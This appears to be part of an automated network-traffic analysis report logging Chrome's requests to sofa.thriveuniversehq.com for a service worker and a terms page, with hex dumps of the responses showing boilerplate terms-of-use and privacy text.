                                                          Data Ascii: e by theuploading user, or a copyright complaint by the rightful owner. Therefore, by uploading any content to our site, you agree that you grant us a universal,perpetual, sublicensable, commercial and non-commercial, irrevocable license to use such c
                                                          2023-11-27 03:24:10 UTC1369INData Raw: 75 63 74 73 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 57 65 20 6d 61 79 20 61 6c 73 6f 20 63 6f 6c 6c 65 63 74 20 61 6e 64 20 73 74 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 61 73 20 79 6f 75 20 6e 61 76 69 67 61 74 65 20 6f 6e 6c 69 6e 65 20 74 68 72 6f 75 67 68 20 74 68 65 20 53 69 74 65 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 77 65 20 6d 61 79 20 63 6f 6c 6c 65 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 09 61 62 6f 75 74 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 27 73 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 6f 20 74 68 65 20 49 6e 74 65 72 6e 65 74 2c 20 77 68 69 63 68 20 61 6c 6c 6f 77 73 20 75 73 2c 20 61 6d 6f 6e 67 20
                                                          Data Ascii: ucts.</p><p dir="ltr">We may also collect and store information that is generated automatically as you navigate online through the Site. For example, we may collect informationabout your computer's connection to the Internet, which allows us, among
                                                          2023-11-27 03:24:10 UTC1369INData Raw: 65 20 70 72 6f 76 69 64 65 72 73 20 61 6e 64 20 63 6f 6e 74 72 61 63 74 6f 72 73 20 66 6f 72 20 61 20 76 61 72 69 65 74 79 20 6f 66 0a 09 70 75 72 70 6f 73 65 73 2e 20 55 6e 6c 65 73 73 20 79 6f 75 20 69 6e 66 6f 72 6d 20 75 73 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 70 72 6f 63 65 73 73 20 64 65 73 63 72 69 62 65 64 20 62 65 6c 6f 77 2c 20 77 65 20 72 65 73 65 72 76 65 20 74 68 65 20 72 69 67 68 74 20 74 6f 20 75 73 65 2c 20 61 6e 64 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 6f 20 74 68 69 72 64 20 70 61 72 74 69 65 73 2c 20 61 6c 6c 20 6f 66 20 74 68 65 0a 09 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 63 6f 6c 6c 65 63 74 65 64 20 66 72 6f 6d 20 61 6e 64 20 61 62 6f 75 74 20 79 6f 75 20 77 68 69 6c 65 20 79 6f 75 20 61 72 65 20
                                                          Data Ascii: e providers and contractors for a variety ofpurposes. Unless you inform us in accordance with the process described below, we reserve the right to use, and to disclose to third parties, all of theinformation collected from and about you while you are
                                                          2023-11-27 03:24:10 UTC1369INData Raw: 72 6d 61 74 69 6f 6e 20 74 68 65 79 20 63 6f 6c 6c 65 63 74 20 74 6f 20 68 65 6c 70 20 70 72 65 73 65 6e 74 20 74 68 65 69 72 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 2c 20 74 6f 0a 09 68 65 6c 70 20 6d 65 61 73 75 72 65 20 61 6e 64 20 72 65 73 65 61 72 63 68 20 74 68 65 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 27 20 65 66 66 65 63 74 69 76 65 6e 65 73 73 2c 20 6f 72 20 66 6f 72 20 6f 74 68 65 72 20 70 75 72 70 6f 73 65 73 2e 20 54 68 65 20 75 73 65 20 61 6e 64 20 63 6f 6c 6c 65 63 74 69 6f 6e 20 6f 66 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 62 79 20 74 68 65 73 65 20 74 68 69 72 64 2d 70 61 72 74 79 0a 09 61 64 76 65 72 74 69 73 65 72 73 20 61 6e 64 20 61 64 20 73 65 72 76 65 72 73 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 74
                                                          Data Ascii: rmation they collect to help present their advertisements, tohelp measure and research the advertisements' effectiveness, or for other purposes. The use and collection of your information by these third-partyadvertisers and ad servers is governed by t


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          49192.168.2.549775104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:12 UTC733OUTGET /service_worker.js HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          Accept: */*
                                                          Service-Worker: script
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: same-origin
                                                          Sec-Fetch-Dest: serviceworker
                                                          Referer: https://sofa.thriveuniversehq.com/service_worker.js
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          If-None-Match: W/"56-6089030eb3a5a-gzip"
                                                          If-Modified-Since: Wed, 25 Oct 2023 20:20:49 GMT
                                                          2023-11-27 03:24:12 UTC667INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 34 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 35 36 2d 36 30 38 39 30 33 30 65 62 33 61 35 61 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 32 36 31 0d 0a 52 65 70 6f 72 74 2d 54 6f
                                                          Data Ascii: HTTP/1.1 304 Not ModifiedDate: Mon, 27 Nov 2023 03:24:12 GMTConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:49 GMTETag: "56-6089030eb3a5a-gzip"Vary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: HITAge: 4261Report-To


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          50192.168.2.549777104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:20 UTC807OUTGET /s3/terms/terms.php HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:24:21 UTC607INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:24:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/
                                                          2023-11-27 03:24:21 UTC762INData Raw: 36 65 36 65 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 61 72 63 68 69 76 65 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 73 6f 66 61 2e 74 68 72 69 76 65 75 6e 69 76 65 72 73 65 68 71 2e 63 6f 6d 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 54 65 72 6d 73 20 61 6e 64 20 43 6f 6e 64 69 74 69 6f 6e 73 20 6f 66 20 55 73 65 20 61
                                                          Data Ascii: 6e6e<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="robots" content="noindex,nofollow,noarchive"></head><body><p dir="ltr">sofa.thriveuniversehq.com</p><p dir="ltr">Terms and Conditions of Use a
                                                          2023-11-27 03:24:21 UTC1369INData Raw: 2c 20 61 73 20 69 73 20 61 70 70 72 6f 70 72 69 61 74 65 20 69 6e 20 74 68 65 20 63 6f 6e 74 65 78 74 20 6f 66 20 74 68 65 20 75 73 65 20 6f 66 20 74 68 65 20 77 6f 72 64 73 2e 20 4c 69 6b 65 77 69 73 65 2c 20 74 68 65 20 77 6f 72 64 73 20 22 79 6f 75 22 20 61 6e 64 20 22 79 6f 75 72 22 0a 09 72 65 66 65 72 20 74 6f 20 79 6f 75 2c 20 74 68 65 20 70 65 72 73 6f 6e 20 77 68 6f 20 69 73 20 62 65 69 6e 67 20 70 72 65 73 65 6e 74 65 64 20 77 69 74 68 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 66 6f 72 20 79 6f 75 72 20 61 67 72 65 65 6d 65 6e 74 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 41 63 63 65 73 73 69 6e 67 20 74 68 65 20 53 69 74 65 2c 20 69 6e 20 61 6e 79 20 6d 61 6e 6e 65 72 2c 20 77 68 65 74 68 65 72 20 61 75 74 6f 6d 61 74
                                                          Data Ascii: , as is appropriate in the context of the use of the words. Likewise, the words "you" and "your"refer to you, the person who is being presented with this document for your agreement.</p><p dir="ltr">Accessing the Site, in any manner, whether automat
                                                          2023-11-27 03:24:21 UTC1369INData Raw: 65 20 6f 66 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 72 6f 6d 20 63 68 69 6c 64 72 65 6e 20 75 6e 64 65 72 20 74 68 65 20 61 67 65 0a 09 6f 66 20 74 68 69 72 74 65 65 6e 2c 20 61 6e 64 20 70 72 6f 76 69 64 65 73 20 69 6d 70 6f 72 74 61 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 72 65 67 61 72 64 69 6e 67 20 74 68 65 69 72 20 72 69 67 68 74 73 20 75 6e 64 65 72 20 66 65 64 65 72 61 6c 20 6c 61 77 20 77 69 74 68 20 72 65 73 70 65 63 74 20 74 6f 20 73 75 63 68 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 75 6c 3e 0a 09 3c 6c 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 09 54 68 69 73 20 53 69 74 65 20 69 73 20 6e 6f 74 20 64 69 72 65 63 74 65 64 20 74
                                                          Data Ascii: e of personal information from children under the ageof thirteen, and provides important information regarding their rights under federal law with respect to such information.</p><br><ul><li dir="ltr"><p dir="ltr">This Site is not directed t
                                                          2023-11-27 03:24:21 UTC1369INData Raw: 6f 74 68 65 72 77 69 73 65 20 64 69 73 74 72 69 62 75 74 65 20 70 65 72 73 6f 6e 61 6c 6c 79 20 69 64 65 6e 74 69 66 69 61 62 6c 65 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 09 09 09 74 68 72 6f 75 67 68 20 74 68 65 20 53 69 74 65 2e 0a 09 09 3c 2f 70 3e 0a 09 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 09 09 42 65 63 61 75 73 65 20 77 65 20 64 6f 20 6e 6f 74 20 63 6f 6c 6c 65 63 74 20 61 6e 79 20 70 65 72 73 6f 6e 61 6c 6c 79 20 69 64 65 6e 74 69 66 69 61 62 6c 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 72 6f 6d 20 63 68 69 6c 64 72 65 6e 20 75 6e 64 65 72 20 74 68 65 20 61 67 65 20 6f 66 20 74 68 69 72 74 65 65 6e 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65
                                                          Data Ascii: otherwise distribute personally identifiable contact informationthrough the Site.</p></li><li dir="ltr"><p dir="ltr">Because we do not collect any personally identifiable information from children under the age of thirteen as part of the
                                                          2023-11-27 03:24:21 UTC1369INData Raw: 66 6f 72 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 2c 20 6e 6f 6e 2d 63 6f 6d 6d 65 72 63 69 61 6c 20 75 73 65 2c 20 70 72 6f 76 69 64 65 64 20 74 68 61 74 20 79 6f 75 20 6b 65 65 70 20 69 6e 74 61 63 74 20 61 6c 6c 20 63 6f 70 79 72 69 67 68 74 20 61 6e 64 20 6f 74 68 65 72 20 70 72 6f 70 72 69 65 74 61 72 79 20 6e 6f 74 69 63 65 73 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 54 68 65 20 74 72 61 64 65 20 6e 61 6d 65 73 20 61 6e 64 20 74 72 61 64 65 6d 61 72 6b 73 20 6f 66 20 74 68 65 20 70 65 72 73 6f 6e 73 20 6f 72 20 65 6e 74 69 74 69 65 73 20 72 65 66 65 72 72 65 64 20 74 6f 20 69 6e 20 6f 75 72 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 20 61 72 65 20 6f 77 6e 65 64 20 62 79 20 74 68 6f 73 65 20 65 6e 74 69 74 69 65 73 2c 20
                                                          Data Ascii: for your personal, non-commercial use, provided that you keep intact all copyright and other proprietary notices.</p><p dir="ltr">The trade names and trademarks of the persons or entities referred to in our advertisements are owned by those entities,
                                                          2023-11-27 03:24:21 UTC1369INData Raw: 20 74 68 65 0a 09 75 70 6c 6f 61 64 69 6e 67 20 75 73 65 72 2c 20 6f 72 20 61 20 63 6f 70 79 72 69 67 68 74 20 63 6f 6d 70 6c 61 69 6e 74 20 62 79 20 74 68 65 20 72 69 67 68 74 66 75 6c 20 6f 77 6e 65 72 2e 20 54 68 65 72 65 66 6f 72 65 2c 20 62 79 20 75 70 6c 6f 61 64 69 6e 67 20 61 6e 79 20 63 6f 6e 74 65 6e 74 20 74 6f 20 6f 75 72 20 73 69 74 65 2c 20 79 6f 75 20 61 67 72 65 65 20 74 68 61 74 20 79 6f 75 20 67 72 61 6e 74 20 75 73 20 61 20 75 6e 69 76 65 72 73 61 6c 2c 0a 09 70 65 72 70 65 74 75 61 6c 2c 20 73 75 62 6c 69 63 65 6e 73 61 62 6c 65 2c 20 63 6f 6d 6d 65 72 63 69 61 6c 20 61 6e 64 20 6e 6f 6e 2d 63 6f 6d 6d 65 72 63 69 61 6c 2c 20 69 72 72 65 76 6f 63 61 62 6c 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 20 73 75 63 68 20 63 6f 6e 74 65
                                                          Data Ascii: theuploading user, or a copyright complaint by the rightful owner. Therefore, by uploading any content to our site, you agree that you grant us a universal,perpetual, sublicensable, commercial and non-commercial, irrevocable license to use such conte
                                                          2023-11-27 03:24:21 UTC1369INData Raw: 2e 0a 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 57 65 20 6d 61 79 20 61 6c 73 6f 20 63 6f 6c 6c 65 63 74 20 61 6e 64 20 73 74 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 68 61 74 20 69 73 20 67 65 6e 65 72 61 74 65 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 61 73 20 79 6f 75 20 6e 61 76 69 67 61 74 65 20 6f 6e 6c 69 6e 65 20 74 68 72 6f 75 67 68 20 74 68 65 20 53 69 74 65 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 77 65 20 6d 61 79 20 63 6f 6c 6c 65 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 09 61 62 6f 75 74 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 27 73 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 6f 20 74 68 65 20 49 6e 74 65 72 6e 65 74 2c 20 77 68 69 63 68 20 61 6c 6c 6f 77 73 20 75 73 2c 20 61 6d 6f 6e 67 20 6f 74 68 65
                                                          Data Ascii: .</p><p dir="ltr">We may also collect and store information that is generated automatically as you navigate online through the Site. For example, we may collect informationabout your computer's connection to the Internet, which allows us, among othe
                                                          2023-11-27 03:24:21 UTC1369INData Raw: 6f 76 69 64 65 72 73 20 61 6e 64 20 63 6f 6e 74 72 61 63 74 6f 72 73 20 66 6f 72 20 61 20 76 61 72 69 65 74 79 20 6f 66 0a 09 70 75 72 70 6f 73 65 73 2e 20 55 6e 6c 65 73 73 20 79 6f 75 20 69 6e 66 6f 72 6d 20 75 73 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 70 72 6f 63 65 73 73 20 64 65 73 63 72 69 62 65 64 20 62 65 6c 6f 77 2c 20 77 65 20 72 65 73 65 72 76 65 20 74 68 65 20 72 69 67 68 74 20 74 6f 20 75 73 65 2c 20 61 6e 64 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 6f 20 74 68 69 72 64 20 70 61 72 74 69 65 73 2c 20 61 6c 6c 20 6f 66 20 74 68 65 0a 09 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 63 6f 6c 6c 65 63 74 65 64 20 66 72 6f 6d 20 61 6e 64 20 61 62 6f 75 74 20 79 6f 75 20 77 68 69 6c 65 20 79 6f 75 20 61 72 65 20 75 73 69 6e
                                                          Data Ascii: oviders and contractors for a variety ofpurposes. Unless you inform us in accordance with the process described below, we reserve the right to use, and to disclose to third parties, all of theinformation collected from and about you while you are usin
                                                          2023-11-27 03:24:21 UTC1369INData Raw: 69 6f 6e 20 74 68 65 79 20 63 6f 6c 6c 65 63 74 20 74 6f 20 68 65 6c 70 20 70 72 65 73 65 6e 74 20 74 68 65 69 72 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 2c 20 74 6f 0a 09 68 65 6c 70 20 6d 65 61 73 75 72 65 20 61 6e 64 20 72 65 73 65 61 72 63 68 20 74 68 65 20 61 64 76 65 72 74 69 73 65 6d 65 6e 74 73 27 20 65 66 66 65 63 74 69 76 65 6e 65 73 73 2c 20 6f 72 20 66 6f 72 20 6f 74 68 65 72 20 70 75 72 70 6f 73 65 73 2e 20 54 68 65 20 75 73 65 20 61 6e 64 20 63 6f 6c 6c 65 63 74 69 6f 6e 20 6f 66 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 62 79 20 74 68 65 73 65 20 74 68 69 72 64 2d 70 61 72 74 79 0a 09 61 64 76 65 72 74 69 73 65 72 73 20 61 6e 64 20 61 64 20 73 65 72 76 65 72 73 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 74 68 65 20 72
                                                          Data Ascii: ion they collect to help present their advertisements, tohelp measure and research the advertisements' effectiveness, or for other purposes. The use and collection of your information by these third-partyadvertisers and ad servers is governed by the r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          51192.168.2.549778104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:23 UTC733OUTGET /service_worker.js HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          Accept: */*
                                                          Service-Worker: script
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: same-origin
                                                          Sec-Fetch-Dest: serviceworker
                                                          Referer: https://sofa.thriveuniversehq.com/service_worker.js
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          If-None-Match: W/"56-6089030eb3a5a-gzip"
                                                          If-Modified-Since: Wed, 25 Oct 2023 20:20:49 GMT
                                                          2023-11-27 03:24:23 UTC661INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 34 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 35 36 2d 36 30 38 39 30 33 30 65 62 33 61 35 61 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 33 38 34 39 0d 0a 52 65 70 6f 72 74 2d 54 6f
                                                          Data Ascii: HTTP/1.1 304 Not ModifiedDate: Mon, 27 Nov 2023 03:24:23 GMTConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:49 GMTETag: "56-6089030eb3a5a-gzip"Vary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: HITAge: 3849Report-To


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          52192.168.2.549780104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:24:32 UTC807OUTGET /s3/terms/terms.php HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:24:32 UTC603INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 34 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:24:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/
                                                          2023-11-27 03:24:32 UTC766INData Raw: 36 65 36 65 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 61 72 63 68 69 76 65 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 73 6f 66 61 2e 74 68 72 69 76 65 75 6e 69 76 65 72 73 65 68 71 2e 63 6f 6d 3c 2f 70 3e 0a 3c 70 20 64 69 72 3d 22 6c 74 72 22 3e 0a 09 54 65 72 6d 73 20 61 6e 64 20 43 6f 6e 64 69 74 69 6f 6e 73 20 6f 66 20 55 73 65 20 61
                                                          Data Ascii: 6e6e<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="robots" content="noindex,nofollow,noarchive"></head><body><p dir="ltr">sofa.thriveuniversehq.com</p><p dir="ltr">Terms and Conditions of Use a
